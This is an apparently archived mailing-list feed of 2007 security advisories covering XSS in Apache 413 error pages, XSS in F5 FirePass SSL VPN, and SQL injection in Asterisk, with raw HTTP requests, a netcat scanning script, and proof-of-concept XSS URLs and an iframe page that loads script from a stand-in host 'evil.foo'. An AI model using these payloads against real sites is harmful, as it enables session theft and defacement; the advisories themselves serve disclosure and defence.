&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.procheckup.com/Vulnerability_2007.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.procheckup.com/Vulnerability_2007.php&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.xigla.com/absolutenmnet/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.xigla.com/absolutenmnet/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd
&lt;br&gt;(www.procheckup.com)
&lt;br&gt;&lt;br&gt;ProCheckUp thanks Xigla Software for working with us.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org&lt;/a&gt;&lt;br&gt;&lt;br&gt;iD8DBQFHVWTjUmN3xwbmU6YRArBaAKCfaedCzv9GoNNvVvpr0qvWwaPHxwCdHEcf
&lt;br&gt;Utw96j4ZOvsAz4vrzne0h2c=
&lt;br&gt;=btup
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/PR07-39%3A-Multiple-vulnerabilities-on-Absolute-News-Manager.NET-5.1-including-file-retrieval-and-SQL-injection-tp14154732p14154732.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14142181</id>
	<title>PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method</title>
	<published>2007-11-30T08:15:14Z</published>
	<updated>2007-11-30T08:15:14Z</updated>
	<author>
		<name>Adrian Pastor</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&lt;br&gt;PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method
&lt;br&gt;&lt;br&gt;&lt;br&gt;Vulnerability found: 7 November 2007
&lt;br&gt;&lt;br&gt;Vendor contacted: 14 November 2007
&lt;br&gt;&lt;br&gt;Risk factor: N/A
&lt;br&gt;&lt;br&gt;The reason why we didn't consider this vulnerability a security risk is
&lt;br&gt;because the attacker needs to force the victim's browser to submit a
&lt;br&gt;malformed HTTP method.
&lt;br&gt;&lt;br&gt;Header injection has been demonstrated to be possible using Flash [1]
&lt;br&gt;[2], but might be dependent on vulnerable Flash plugins.
&lt;br&gt;&lt;br&gt;A relevant example published in the past is exploiting the Apache
&lt;br&gt;'Expect' XSS [3] (CVE-2006-3918) using flash [4].
&lt;br&gt;&lt;br&gt;However, in this case we need to spoof the HTTP METHOD to a
&lt;br&gt;specially-crafted value.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;&lt;br&gt;It is possible to cause Apache HTTP server to return client-supplied
&lt;br&gt;scripting code by submitting a malformed HTTP method which would
&lt;br&gt;actually carry the payload (i.e.: malicious JavaScript) and invalid
&lt;br&gt;length data in the form of either of the following:
&lt;br&gt;&lt;br&gt;&amp;nbsp;Two 'Content-length:' headers equals to zero. i.e.: &amp;quot;Content-Length:
&lt;br&gt;0[LF]Content-Length: 0&amp;quot;
&lt;br&gt;&amp;nbsp;One 'Content-length:' header equals to two values. i.e.:
&lt;br&gt;&amp;quot;Content-length: 0, 0&amp;quot;
&lt;br&gt;&amp;nbsp;One 'Content-length:' header equals to a negative value. i.e.:
&lt;br&gt;&amp;quot;Content-length: -1&amp;quot;
&lt;br&gt;&amp;nbsp;One 'Content-length:' header equals to a large value. i.e.:
&lt;br&gt;&amp;quot;Content-length: 9999999999999999999999999999999999999999999999&amp;quot;
&lt;br&gt;&lt;br&gt;&lt;br&gt;Apache 2.X returns a '413 Request Entity Too Large' error, when
&lt;br&gt;submitting invalid length data. When probing for XSS on the error page
&lt;br&gt;returned by the server we have 3 possible string vectors:
&lt;br&gt;&lt;br&gt;&amp;nbsp;The 'Host:' header
&lt;br&gt;&amp;nbsp;The URL
&lt;br&gt;&amp;nbsp;The HTTP method
&lt;br&gt;&lt;br&gt;If we probe for XSS using the 'Host:' header, Apache correctly filters
&lt;br&gt;the angle brackets and replaces them with HTML entities:
&lt;br&gt;&lt;br&gt;REQUEST:
&lt;br&gt;&lt;br&gt;GET / HTTP/1.1
&lt;br&gt;Host: &amp;lt;BADCHARS&amp;gt;
&lt;br&gt;Connection: close
&lt;br&gt;Content-length: -1
&lt;br&gt;[LF]
&lt;br&gt;[LF]
&lt;br&gt;&lt;br&gt;&lt;br&gt;SERVER'S REPONSE:
&lt;br&gt;&lt;br&gt;HTTP/1.1 413 Request Entity Too Large
&lt;br&gt;Date: Fri, 30 Nov 2007 12:40:19 GMT
&lt;br&gt;Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
&lt;br&gt;Connection: close
&lt;br&gt;Content-Type: text/html; charset=iso-8859-1
&lt;br&gt;&lt;br&gt;&amp;lt;!DOCTYPE HTML PUBLIC &amp;quot;-//IETF//DTD HTML 2.0//EN&amp;quot;&amp;gt;
&lt;br&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;
&lt;br&gt;&amp;lt;title&amp;gt;413 Request Entity Too Large&amp;lt;/title&amp;gt;
&lt;br&gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;
&lt;br&gt;&amp;lt;h1&amp;gt;Request Entity Too Large&amp;lt;/h1&amp;gt;
&lt;br&gt;The requested resource&amp;lt;br /&amp;gt;/&amp;lt;br /&amp;gt;
&lt;br&gt;does not allow request data with GET requests, or the amount of data
&lt;br&gt;provided in
&lt;br&gt;the request exceeds the capacity limit.
&lt;br&gt;&amp;lt;hr&amp;gt;
&lt;br&gt;&amp;lt;address&amp;gt;Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at &amp;lt;badchars&amp;gt;
&lt;br&gt;Port 80&amp;lt;/address&amp;gt;
&lt;br&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;Notice that '&amp;lt;BADCHARS&amp;gt;' gets replaced with '&amp;lt;badchars&amp;gt;'
&lt;br&gt;&lt;br&gt;If we probe for XSS using the URL, Apache ALSO correctly filters the
&lt;br&gt;angle brackets and replaces them with HTML entities:
&lt;br&gt;&lt;br&gt;REQUEST:
&lt;br&gt;&lt;br&gt;GET /&amp;lt;BADCHARS&amp;gt;/ HTTP/1.1
&lt;br&gt;Host: target-domain.foo
&lt;br&gt;Connection: close
&lt;br&gt;Content-length: -1
&lt;br&gt;[LF]
&lt;br&gt;[LF]
&lt;br&gt;&lt;br&gt;&lt;br&gt;SERVER'S RESPONSE:
&lt;br&gt;&lt;br&gt;HTTP/1.1 413 Request Entity Too Large
&lt;br&gt;Date: Fri, 30 Nov 2007 12:41:17 GMT
&lt;br&gt;Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
&lt;br&gt;Connection: close
&lt;br&gt;Content-Type: text/html; charset=iso-8859-1
&lt;br&gt;&lt;br&gt;&amp;lt;!DOCTYPE HTML PUBLIC &amp;quot;-//IETF//DTD HTML 2.0//EN&amp;quot;&amp;gt;
&lt;br&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;
&lt;br&gt;&amp;lt;title&amp;gt;413 Request Entity Too Large&amp;lt;/title&amp;gt;
&lt;br&gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;
&lt;br&gt;&amp;lt;h1&amp;gt;Request Entity Too Large&amp;lt;/h1&amp;gt;
&lt;br&gt;The requested resource&amp;lt;br /&amp;gt;/&amp;lt;BADCHARS&amp;gt;/&amp;lt;br /&amp;gt;
&lt;br&gt;does not allow request data with GET requests, or the amount of data
&lt;br&gt;provided in
&lt;br&gt;the request exceeds the capacity limit.
&lt;br&gt;&amp;lt;hr&amp;gt;
&lt;br&gt;&amp;lt;address&amp;gt;Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo
&lt;br&gt;Port 80&amp;lt;/address&amp;gt;
&lt;br&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;Again, '&amp;lt;BADCHARS&amp;gt;' gets replaced with '&amp;lt;badchars&amp;gt;'
&lt;br&gt;&lt;br&gt;&lt;br&gt;However, if we probe for XSS using a malformed HTTP method, the angle
&lt;br&gt;brackets are NOT replaced with HTML entities:
&lt;br&gt;&lt;br&gt;&lt;br&gt;REQUEST:
&lt;br&gt;&lt;br&gt;&amp;lt;BADCHARS&amp;gt; / HTTP/1.1
&lt;br&gt;Host: target-domain.foo
&lt;br&gt;Connection: close
&lt;br&gt;Content-length: -1
&lt;br&gt;[LF]
&lt;br&gt;[LF]
&lt;br&gt;&lt;br&gt;&lt;br&gt;SERVER'S RESPONSE:
&lt;br&gt;&lt;br&gt;HTTP/1.1 413 Request Entity Too Large
&lt;br&gt;Date: Fri, 30 Nov 2007 12:42:46 GMT
&lt;br&gt;Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
&lt;br&gt;Connection: close
&lt;br&gt;Content-Type: text/html; charset=iso-8859-1
&lt;br&gt;&lt;br&gt;&amp;lt;!DOCTYPE HTML PUBLIC &amp;quot;-//IETF//DTD HTML 2.0//EN&amp;quot;&amp;gt;
&lt;br&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;
&lt;br&gt;&amp;lt;title&amp;gt;413 Request Entity Too Large&amp;lt;/title&amp;gt;
&lt;br&gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;
&lt;br&gt;&amp;lt;h1&amp;gt;Request Entity Too Large&amp;lt;/h1&amp;gt;
&lt;br&gt;The requested resource&amp;lt;br /&amp;gt;/&amp;lt;br /&amp;gt;
&lt;br&gt;does not allow request data with &amp;lt;BADCHARS&amp;gt; requests, or the amount of
&lt;br&gt;data provided in
&lt;br&gt;the request exceeds the capacity limit.
&lt;br&gt;&amp;lt;hr&amp;gt;
&lt;br&gt;&amp;lt;address&amp;gt;Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo
&lt;br&gt;Port 80&amp;lt;/address&amp;gt;
&lt;br&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;The following script could be used to audit your network for vulnerable
&lt;br&gt;web servers:
&lt;br&gt;&lt;br&gt;#!/bin/bash
&lt;br&gt;# PR07-37-scan
&lt;br&gt;if [ $# -ne 1 ]
&lt;br&gt;then
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; echo &amp;quot;$0 &amp;lt;hosts-file&amp;gt;&amp;quot;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; exit
&lt;br&gt;fi
&lt;br&gt;&lt;br&gt;for i in `cat $1`
&lt;br&gt;do
&lt;br&gt;&lt;br&gt;if echo -en &amp;quot;&amp;lt;PROCHECKUP&amp;gt; / HTTP/1.1\nHost: $i\nConnection:
&lt;br&gt;close\nContent-length: 0\nContent-length: 0\n\n&amp;quot; | nc -w 4 $i 80 | grep
&lt;br&gt;- -i '&amp;lt;PROCHECKUP&amp;gt;' &amp;gt; /dev/null
&lt;br&gt;then
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; echo &amp;quot;$i is VULNERABLE!&amp;quot;
&lt;br&gt;fi
&lt;br&gt;&lt;br&gt;done
&lt;br&gt;&lt;br&gt;&lt;br&gt;Vulnerability successfully tested on (banners extracted from server
&lt;br&gt;headers):
&lt;br&gt;&lt;br&gt;Server: Apache/2.0.46 (Red Hat)
&lt;br&gt;Server: Apache/2.0.51 (Fedora)
&lt;br&gt;Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
&lt;br&gt;Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7g
&lt;br&gt;Server: Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2
&lt;br&gt;Server: Apache/2.2.4 (Linux/SUSE)
&lt;br&gt;&lt;br&gt;&lt;br&gt;Note: other versions might also be vulnerable.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Consequences:
&lt;br&gt;&lt;br&gt;This type of attack can result in non-persistent defacement of the
&lt;br&gt;target site, or the redirection of confidential information (i.e.
&lt;br&gt;session IDs) to unauthorised third parties provided that a web browser
&lt;br&gt;is tricked to submit a malformed HTTP method.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Workaround:
&lt;br&gt;&lt;br&gt;Disable Apache's default 413 error pages by adding a 'ErrorDocument 413'
&lt;br&gt;statement to the Apache config file.
&lt;br&gt;&lt;br&gt;&lt;br&gt;References:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.procheckup.com/Vulnerability_2007.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.procheckup.com/Vulnerability_2007.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;[1] &amp;quot;Forging HTTP request headers with Flash&amp;quot;
&lt;br&gt;&lt;a href=&quot;http://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;[2] &amp;quot;HTTP Header Injection Vulnerabilities in the Flash Player Plugin&amp;quot;
&lt;br&gt;&lt;a href=&quot;http://download2.rapid7.com/r7-0026/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://download2.rapid7.com/r7-0026/&lt;/a&gt;&lt;br&gt;&lt;br&gt;[3] &amp;quot;Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1&amp;quot;
&lt;br&gt;&lt;a href=&quot;http://www.securityfocus.com/archive/1/433280&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.securityfocus.com/archive/1/433280&lt;/a&gt;&lt;br&gt;&lt;br&gt;[4] &amp;quot;More Expect Exploitation In Flash&amp;quot;
&lt;br&gt;&lt;a href=&quot;http://ha.ckers.org/blog/20071103/more-expect-exploitation-in-flash/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://ha.ckers.org/blog/20071103/more-expect-exploitation-in-flash/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Credits: Adrian Pastor and Amir Azam of ProCheckUp Ltd (www.procheckup.com).
&lt;br&gt;&lt;br&gt;Special thanks go to Amit Klein and Joe Orton for providing such
&lt;br&gt;valuable feedback.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org&lt;/a&gt;&lt;br&gt;&lt;br&gt;iD8DBQFHUDcSUmN3xwbmU6YRApBiAJ4qj8fxM0aXe70OHmerS4SCxhMxjQCdETTm
&lt;br&gt;mQehf2QDRpoig1kjzxdIEcU=
&lt;br&gt;=qQdC
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/PR07-37%3A-XSS-on-Apache-HTTP-Server-413-error-pages-via-malformed-HTTP-method-tp14142181p14142181.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14141532</id>
	<title>PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.activation.php3' server-side script</title>
	<published>2007-11-30T04:49:54Z</published>
	<updated>2007-11-30T04:49:54Z</updated>
	<author>
		<name>Adrian Pastor</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100
&lt;br&gt;SSL VPN 'my.activation.php3' server-side script
&lt;br&gt;&lt;br&gt;Date Found: 19th June 2007
&lt;br&gt;&lt;br&gt;Successfully tested on: version 5.5.2
&lt;br&gt;&lt;br&gt;F5 Networks has confirmed the following versions to be vulnerable:
&lt;br&gt;&lt;br&gt;FirePass versions 5.4.1 - 5.5.2
&lt;br&gt;FirePass versions 6.0 - 6.0.1
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;&lt;br&gt;F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the
&lt;br&gt;&amp;quot;my.activation.php3&amp;quot; server-side script.
&lt;br&gt;&lt;br&gt;No authentication is required to exploit this vulnerability.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Consequences:
&lt;br&gt;&lt;br&gt;An attacker may be able to cause execution of malicious scripting code
&lt;br&gt;in the browser of a user who visits a specially-crafted URL to an F5
&lt;br&gt;Firepass device, or visits a malicious page that makes a request to such
&lt;br&gt;URL. Such code would run within the security context of the target domain.
&lt;br&gt;&lt;br&gt;This type of attack can result in non-persistent defacement of the
&lt;br&gt;target site, or the redirection of confidential information (i.e. admin
&lt;br&gt;session IDs) to unauthorised third parties.
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Proof of concept (PoC) URL:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;https://target.tld/my.activation.php3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://target.tld/my.activation.php3&lt;/a&gt;?&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;textarea&amp;gt;HTML_injection_test&amp;lt;/textarea&amp;gt;&amp;lt;!--
&lt;br&gt;&lt;br&gt;The payload in the example is
&lt;br&gt;&lt;br&gt;&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;textarea&amp;gt;HTML_injection_test&amp;lt;/textarea&amp;gt;&amp;lt;!--
&lt;br&gt;&lt;br&gt;which injects a 'textarea' box
&lt;br&gt;&lt;br&gt;&lt;br&gt;The following PoC HTML page would run JavaScript without any
&lt;br&gt;restrictions from a third-party file ('&lt;a href=&quot;http://www.evil.foo/b'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.evil.foo/b'&lt;/a&gt;&amp;nbsp;in this case):
&lt;br&gt;&lt;br&gt;&amp;lt;html&amp;gt;
&lt;br&gt;&lt;br&gt;&amp;lt;iframe
&lt;br&gt;src=&amp;quot;&lt;a href=&quot;https://target.tld/my.activation.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://target.tld/my.activation.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--&lt;/a&gt;&amp;quot;
&lt;br&gt;width=&amp;quot;0%&amp;quot; height=&amp;quot;0%&amp;quot;
&lt;br&gt;name=&amp;quot;xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','&lt;a href=&quot;http://www.evil.foo/b'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.evil.foo/b'&lt;/a&gt;)&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;
&lt;br&gt;&lt;br&gt;&amp;lt;/html&amp;gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Successfully tested on:
&lt;br&gt;&lt;br&gt;Server environment:
&lt;br&gt;&lt;br&gt;F5 FirePass 4100
&lt;br&gt;&lt;br&gt;Client environment:
&lt;br&gt;&lt;br&gt;Microsoft Internet Explorer 7.0.5730.11
&lt;br&gt;&lt;br&gt;&lt;br&gt;Severity: Medium/High
&lt;br&gt;&lt;br&gt;&lt;br&gt;Authors: Adrian Pastor and Jan Fry of ProCheckUp Ltd (www.procheckup.com).
&lt;br&gt;&lt;br&gt;With thanks to Petko D. Petkov for suggesting the eval(name) technique.
&lt;br&gt;&lt;br&gt;&lt;br&gt;References:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.procheckup.com/Vulnerability_2007.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.procheckup.com/Vulnerability_2007.php&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.f5.com/products/FirePass/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.f5.com/products/FirePass/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Fix:
&lt;br&gt;&lt;br&gt;F5 Networks has issued SOL7923:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org&lt;/a&gt;&lt;br&gt;&lt;br&gt;iD8DBQFHUAbyUmN3xwbmU6YRAu2zAJ4gwWStG8drTy6jn7eAl2dLBGtiTACfccst
&lt;br&gt;7J8K7gEr7efixJBejJv5vak=
&lt;br&gt;=W5Zm
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/PR07-14%3A-Cross-site-Scripting-%28XSS%29---HTML-injection-on-F5-FirePass-4100-SSL-VPN-%27my.activation.php3%27-server-side-script-tp14141532p14141532.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14140680</id>
	<title>AST-2007-026 - SQL Injection issue in cdr_pgsql</title>
	<published>2007-11-29T15:14:03Z</published>
	<updated>2007-11-29T15:14:03Z</updated>
	<author>
		<name>Asterisk Security Team-2</name>
	</author>
	<content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Asterisk Project Security Advisory - AST-2007-026
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Asterisk &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Summary &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| SQL Injection issue in cdr_pgsql &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp;Nature of Advisory &amp;nbsp;| SQL Injection &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Susceptibility &amp;nbsp; &amp;nbsp;| Remote Authenticated Sessions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Severity &amp;nbsp; &amp;nbsp; &amp;nbsp; | Moderate &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Exploits Known &amp;nbsp; &amp;nbsp;| No &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Reported On &amp;nbsp; &amp;nbsp; &amp;nbsp;| November 29, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Reported By &amp;nbsp; &amp;nbsp; &amp;nbsp;| Tilghman Lesher &amp;lt;tlesher AT digium DOT com&amp;gt; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Posted On &amp;nbsp; &amp;nbsp; &amp;nbsp; | November 29, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Last Updated On &amp;nbsp; &amp;nbsp;| November 29, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Advisory Contact &amp;nbsp; | Tilghman Lesher &amp;lt;tlesher AT digium DOT com&amp;gt; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; CVE Name &amp;nbsp; &amp;nbsp; &amp;nbsp; | CVE-2007-6170 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Description | Input buffers were not properly escaped when providing &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | the ANI and DNIS strings to the Call Detail Record &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | Postgres logging engine. An attacker could potentially &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | compromise the administrative database containing users' |
